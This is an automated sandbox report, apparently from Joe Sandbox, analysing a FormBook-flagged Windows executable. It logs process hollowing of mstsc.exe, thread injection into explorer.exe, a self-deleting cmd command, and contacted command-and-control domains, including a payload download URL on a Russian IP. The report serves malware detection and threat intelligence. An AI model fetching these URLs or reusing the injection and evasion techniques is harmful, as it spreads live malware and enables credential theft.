Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E742AF mov eax, dword ptr fs:[00000030h]	6_2_34E742AF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E742AF mov eax, dword ptr fs:[00000030h]	6_2_34E742AF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E492AF mov eax, dword ptr fs:[00000030h]	6_2_34E492AF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2B2BC mov eax, dword ptr fs:[00000030h]	6_2_34F2B2BC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2B2BC mov eax, dword ptr fs:[00000030h]	6_2_34F2B2BC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2B2BC mov eax, dword ptr fs:[00000030h]	6_2_34F2B2BC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2B2BC mov eax, dword ptr fs:[00000030h]	6_2_34F2B2BC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4C2B0 mov ecx, dword ptr fs:[00000030h]	6_2_34E4C2B0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F192AB mov eax, dword ptr fs:[00000030h]	6_2_34F192AB

Source: C:\Windows\SysWOW64\mstsc.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 0_2_100015D0 Free,LdrInitializeThunk,VirtualFree,GlobalFree,

0_2_100015D0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 165.160.15.20 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 206.233.207.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.185.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 183.181.96.18 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.187.111.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.248.157.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.26.48.101 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.17.29.147 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.186.51 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 169.60.232.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.39.114 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 870000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Thread register set: target process: 4768			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 4768			Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Process created: C:\Users\user\Desktop\SC.028UCCP.exe C:\Users\user\Desktop\SC.028UCCP.exe			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\SC.028UCCP.exe"			Jump to behavior

Source: explorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.7451826798.0000000004D50000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 0_2_00405BBA GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405BBA

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	512 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Masquerading	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	12 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	512 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	4 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SC.028UCCP.exe	51%	Virustotal		Browse
SC.028UCCP.exe	33%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.mstsc.exe.50cf840.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
8.2.mstsc.exe.2f43518.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
7.2.explorer.exe.13c7f840.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
amyjohnsonrealtor.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://195.133.40.46/CsPlxqjFa224.bin0	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://195.133.40.46/CsPlxqjFa224.bin3	0%	Avira URL Cloud	safe
http://www.economjchq.space/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb	0%	Avira URL Cloud	safe
http://www.findyellowfreightjobs.com/ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ	0%	Avira URL Cloud	safe
http://www.amyjohnsonrealtor.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap	0%	Avira URL Cloud	safe
http://www.hospitalityhsia.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy	0%	Avira URL Cloud	safe
http://www.triknblog.net/ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQ	0%	Avira URL Cloud	safe
https://www.laposadaapts.com/ms12/?hT=vo99NxIlv9atltQAf5	0%	Avira URL Cloud	safe
http://www.friendsofquarepianos.co.uk/ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8m	0%	Avira URL Cloud	safe
http://195.133.40.46/CsPlxqjFa224.bin	0%	Avira URL Cloud	safe
http://www.drugtestingservices.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGT	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
https://excel.office.coma	0%	Avira URL Cloud	safe
http://www.conscienciaretroprogresiva.com/ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQ	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://195.133.40.46/G	0%	Avira URL Cloud	safe
http://195.133.40.46/	0%	Avira URL Cloud	safe
www.eliteequinewellness.com/ms12/	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://195.133.40.46/CsPlxqjFa224.binU	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.arialttnr.com/ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m	0%	Avira URL Cloud	safe
http://195.133.40.46/CsPlxqjFa224.bin~	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://www.paparazirestaurant.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2//	0%	Avira URL Cloud	safe
http://www.eliteequinewellness.com/ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m	0%	Avira URL Cloud	safe
http://www.lists-cellphones.life/ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m	0%	Avira URL Cloud	safe
http://www.garageautosaintthomas.com/ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8m	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.lists-cellphones.life	104.21.39.114	true	true		unknown
www.friendsofquarepianos.co.uk	81.17.29.147	true	true		unknown
www.economjchq.space	188.114.97.3	true	true		unknown
amyjohnsonrealtor.com	13.248.157.32	true	true	0%, Virustotal, Browse	unknown
www.hospitalityhsia.com	206.233.207.174	true	true		unknown
conscienciaretroprogresiva.com	34.102.136.180	true	false		unknown
www.triknblog.net	183.181.96.18	true	true		unknown
www.paparazirestaurant.co.uk	192.187.111.221	true	true		unknown
www.findyellowfreightjobs.com	169.60.232.139	true	true		unknown
www.drugtestingservices.co.uk	165.160.15.20	true	true		unknown
www.abimpianti.ch	217.26.48.101	true	true		unknown
ext-sq.squarespace.com	198.185.159.144	true	false		high
ghs.googlehosted.com	142.250.185.211	true	false		unknown
www.goverifyvin.com	unknown	unknown	true		unknown
97.97.242.52.in-addr.arpa	unknown	unknown	true		unknown
www.top-promotion.net	unknown	unknown	true		unknown
www.amyjohnsonrealtor.com	unknown	unknown	true		unknown
www.conscienciaretroprogresiva.com	unknown	unknown	true		unknown
www.eliteequinewellness.com	unknown	unknown	true		unknown
www.arialttnr.com	unknown	unknown	true		unknown
www.garageautosaintthomas.com	unknown	unknown	true		unknown
www.laposadaapts.com	unknown	unknown	true		unknown
www.eeccu.info	unknown	unknown	true		unknown
www.thinkdev.africa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.friendsofquarepianos.co.uk/ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8m	true	Avira URL Cloud: safe	unknown
http://www.hospitalityhsia.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy	true	Avira URL Cloud: safe	unknown
http://www.findyellowfreightjobs.com/ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ	true	Avira URL Cloud: safe	unknown
http://www.economjchq.space/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb	true	Avira URL Cloud: safe	unknown
http://www.amyjohnsonrealtor.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap	true	Avira URL Cloud: safe	unknown
http://www.triknblog.net/ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQ	true	Avira URL Cloud: safe	unknown
http://195.133.40.46/CsPlxqjFa224.bin	true	Avira URL Cloud: safe	unknown
http://www.drugtestingservices.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGT	true	Avira URL Cloud: safe	unknown
http://www.conscienciaretroprogresiva.com/ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQ	false	Avira URL Cloud: safe	unknown
www.eliteequinewellness.com/ms12/	true	Avira URL Cloud: safe	low
http://www.arialttnr.com/ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m	false	Avira URL Cloud: safe	unknown
http://www.eliteequinewellness.com/ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m	false	Avira URL Cloud: safe	unknown
http://www.paparazirestaurant.co.uk/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2//	true	Avira URL Cloud: safe	unknown
http://www.lists-cellphones.life/ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m	true	Avira URL Cloud: safe	unknown
http://www.garageautosaintthomas.com/ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8m	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000007.00000000.2898033699.000000000996D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://195.133.40.46/CsPlxqjFa224.bin3	SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.133.40.46/CsPlxqjFa224.bin0	SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://www.laposadaapts.com/ms12/?hT=vo99NxIlv9atltQAf5	explorer.exe, 00000007.00000002.7485227128.000000001416F000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	SC.028UCCP.exe, 00000000.00000000.2396678614.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000006.00000000.2747209758.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000626000.00000020.00000001.01000000.00000007.sdmp	false		high
http://schemas.micro	explorer.exe, 00000007.00000002.7445959237.0000000002C70000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gopher.ftp://ftp.	SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://excel.office.coma	explorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.133.40.46/G	SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	SC.028UCCP.exe, 00000006.00000001.2747874116.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/j	explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	SC.028UCCP.exe, SC.028UCCP.exe, 00000000.00000000.2396678614.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000006.00000000.2747209758.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false		high
http://195.133.40.46/	SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7B000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C5B000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.133.40.46/CsPlxqjFa224.binU	SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	SC.028UCCP.exe, 00000006.00000001.2747874116.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
http://195.133.40.46/CsPlxqjFa224.bin~	SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
165.160.15.20	www.drugtestingservices.co.uk	United States	19574	CSCUS	true
195.133.40.46	unknown	Russian Federation	57844	SPD-NETTR	true
206.233.207.174	www.hospitalityhsia.com	United States	174	COGENT-174US	true
142.250.185.211	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
183.181.96.18	www.triknblog.net	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
192.187.111.221	www.paparazirestaurant.co.uk	United States	33387	NOCIXUS	true
13.248.157.32	amyjohnsonrealtor.com	United States	16509	AMAZON-02US	true
198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	false
217.26.48.101	www.abimpianti.ch	Switzerland	29097	HOSTPOINT-ASCH	true
188.114.97.3	www.economjchq.space	European Union	13335	CLOUDFLARENETUS	true
81.17.29.147	www.friendsofquarepianos.co.uk	Switzerland	51852	PLI-ASCH	true
34.102.136.180	conscienciaretroprogresiva.com	United States	15169	GOOGLEUS	false
142.250.186.51	unknown	United States	15169	GOOGLEUS	false
169.60.232.139	www.findyellowfreightjobs.com	United States	36351	SOFTLAYERUS	true
104.21.39.114	www.lists-cellphones.life	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.11.1

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	830301
Start date and time:	2023-03-20 09:06:32 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	SC.028UCCP.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/4@24/16
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 16% (good quality ratio 15.4%) Quality average: 80.5% Quality standard deviation: 25.7%
HCA Information:	Successful, ratio: 87% Number of executed functions: 59 Number of non-executed functions: 276
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
Excluded IPs from analysis (whitelisted): 51.105.236.244, 104.17.167.40, 104.17.168.40, 104.17.169.40, 104.17.170.40, 104.17.171.40
Excluded domains from analysis (whitelisted): www.rentcafecloudflarecn.com.cdn.cloudflare.net, client.wns.windows.com, wdcpalt.microsoft.com, slscr.update.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
165.160.15.20	31saH6ygm7.exe	Get hash	malicious	Unknown	Browse	myups.biz/heiloxgobagc
	MZykmSpz4e.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.atkins-reals.com/hd4e/?H6NUp=kUa0+T6WMm48BmQxSuyK9U4Ypszee0x0kqAHb9BaRVglWOAREq5rMeDq7s+Ap0CLCPAYB1RVxdwLIFkbyQ7rMsM5jtiCjVkQeQ==&qkf=S3_tJoUs5YU3W
	o0G3mAJ7Ud.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.atkins-reals.com/hd4e/?Qt=kUa0+T6WMm48BmQxSuyK9U4Ypszee0x0kqAHb9BaRVglWOAREq5rMeDq7s+Ap0CLCPAYB1RVxdwLIFkbyQ7rMsM5jtiCjVkQeQ==&szm=-piDmSHeQ-mzBSst
	OFFER REQUEST-73642.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.taylorwessingltd.co.uk/q0ti/?-LApoir=bIYHJ84VfYkA+BXCKQG/GZ1cfDd27QHcmZqhTIR8s9YyiwhzcUvDLOL79sMCZRYZhacrMwbzwUlzi7EcJxCYZ5ii/YpWmIFenw==&O2=Pmr4vtTde
	DOC20221011567890987655600000.exe	Get hash	malicious	FormBook	Browse	www.twitter-supporting.net/c1no/?-Z4p2V_=uHBcWzjc+KKyIoaIswj376agaxDubPoziLvic4J6l3OBecVtTqReIP1Ky1VrbdDQzEC775/1R9/fXVpsTXL2Z3MXnL1Gm2TZxg==&tTph=Pt0lyn-
	SecuriteInfo.com.Trojan.DownloaderNET.346.2603.24761.exe	Get hash	malicious	FormBook	Browse	www.twitter-supporting.net/c1no/?R0GtoD=uHBcWzjc+KKyIoaIswj376agaxDubPoziLvic4J6l3OBecVtTqReIP1Ky1VrbdDQzEC775/1R9/fXVpsTXL2Z3MXnL1Gm2TZxg==&6lSH=8pRhMLk0HFn
